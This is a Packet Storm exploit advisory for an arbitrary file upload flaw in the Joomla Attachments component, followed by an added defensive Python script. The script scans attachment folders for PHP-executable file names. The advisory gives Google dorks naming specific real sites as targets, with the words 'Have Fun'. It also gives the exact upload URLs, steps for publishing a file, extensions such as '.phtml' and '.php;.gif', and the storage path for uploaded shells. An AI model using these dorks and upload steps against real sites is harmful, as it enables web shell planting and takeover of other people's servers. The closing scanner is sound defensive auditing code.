packetstorm | KingSkrupellos | PACKETSTORM:153088
May 26, 2019 - 12:00 a.m.

Joomla Attachments 3.x File Upload

`####################################################################  
  
# Exploit Title : Joomla Com_Attachments Components 3.x Arbitrary File Upload  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 26/05/2019  
# Vendor Homepage : jmcameron.net  
# Software Download Links : jmcameron.net/attachments/  
jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip  
joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip  
joomlacode.org/gf/project/attachments/frs/  
github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/  
# Software Information Links : extensions.joomla.org/extension/attachments/  
joomlacode.org/gf/project/attachments/  
joomlacode.org/gf/project/attachments3/  
# Joomla Affected Versions :  
Joomla 3.4.8  
Joomla 3.5.1  
Joomla 3.6.5  
Joomla 3.8.1  
Joomla 3.8.11  
Joomla 3.8.3  
Joomla 3.9.6  
# Software Affected Versions [ Component Com_Attachments ] :   
2.2.2 and 3.2.6 - 3.x / All previous versions.  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks :   
inurl:/index.php?option=com_attachments&task=upload  
intext:Copyright (C) 2006-2020 BSA Troop 444. All Rights Reserved.  
intext:Treadmill Desk from TrekDesk  
intext:Copyright © 2015 Ashleigh-D. All rights reserved. Website designed by Mojosync Pty Ltd using Joomla  
intext:Fundación Jesuitas Paraguay  
intext:© 2019 Mars Society Polska  
intext:Designed by atict.com  
intext:Copyright © 2017. All Rights Reserved.Webaloss - Realizzazione siti webwebaloss.com  
intext:Designed by Burosphere.  
intext:Conselho Nacional de Recursos Hídricos CNRH Ministerio Do Desenvolvimento Regional  
and more on Google and other Search Engines...... Have Fun....  
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
# Reference Link [ Similar ] : dl.packetstormsecurity.net/1902-exploits/joomlaattachments326-shell.txt  
  
####################################################################  
  
# Description about Software :  
***************************  
The 'Attachments' extension allows files to be uploaded and attached to content  
articles in Joomla. Includes a plugin to display attachments and a component  
for uploading and managing attachments.  
  
####################################################################  
  
# Impact :  
***********  
Joomla Attachments Components 3.x and previous versions could allow a  
remote attacker to upload arbitrary files (including a shell upload), caused by improper validation  
of file extensions by multiple scripts called via index.php. The issue occurs because  
the application fails to adequately sanitize user-supplied input.  
Exploiting this issue will allow attackers to execute arbitrary code within  
the context of the affected application. This may facilitate unauthorized access  
or privilege escalation; other attacks may also be possible.  
By sending a specially crafted HTTP request, a remote attacker could exploit  
this vulnerability to upload a malicious PHP script, which could allow the  
attacker to execute arbitrary PHP code on the vulnerable system.  
  
####################################################################  
  
# Arbitrary File Upload/Unauthorized File Insertion Exploit :  
****************************************************  
/index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme  
  
/index.php?option=com_attachments&task=upload&uri=file&parent_id=[ARTICLE-ID-NUMBER]/&parent_type=com_content&tmpl=component&from=closeme  
  
Click "Select file to upload instead" - Fill the Form - Published => "Yes" and Click "Public"  
  
Attach file: - Upload your .txt .jpg .gif .png .phtml .php;.gif file to the vulnerable system.  
  
# Directory File Path :  
********************  
/attachments/article/[ARTICLE-ID-NUMBER]/kingskrupellos.txt  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`
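
For defenders auditing a site that ran an affected Attachments version, the following is an added example (not code from the advisory or from the Attachments project) that walks the `/attachments/article/` tree named above and flags stored files whose names carry a PHP-executable extension, including the `.phtml` and `.php;.gif` forms the advisory lists. The extension set, the function names and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Extensions a PHP-enabled web server may hand to the interpreter.
# Assumed list: adjust it to the handlers actually configured on the server.
EXEC_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}

def risky_reason(filename):
    """Return why a stored attachment name is dangerous, or None if it looks inert."""
    name = filename.lower()
    # Split on '.' and ';' so 'x.php;.gif' and 'x.php.jpg' expose every segment.
    parts = [p for p in re.split(r"[.;]", name) if p]
    if len(parts) < 2:
        return None
    exts = parts[1:]
    if exts[-1] in EXEC_EXTS:
        return "executable extension ." + exts[-1]
    hidden = [e for e in exts[:-1] if e in EXEC_EXTS]
    if hidden:
        return "executable extension ." + hidden[0] + " hidden before ." + exts[-1]
    return None

def scan_attachments(root):
    """Walk an attachments directory and return sorted (relative_path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            reason = risky_reason(f)
            if reason:
                rel = os.path.relpath(os.path.join(dirpath, f), root)
                findings.append((rel, reason))
    return sorted(findings)

def demo():
    """Build a constructed sample tree (empty files) and scan it."""
    sample = ("article/1/kingskrupellos.txt",   # inert text file
              "article/1/photo.php;.gif",       # executable extension hidden by ';'
              "article/7/notes.phtml")          # directly executable extension
    with tempfile.TemporaryDirectory() as root:
        for rel in sample:
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            open(path, "w").close()
        return scan_attachments(root)

if __name__ == "__main__":
    for path, reason in demo():
        print(path, "->", reason)
```

Run `scan_attachments()` against the real attachments directory of the site; any finding should be treated as a possible uploaded script and checked against upload times and web server logs.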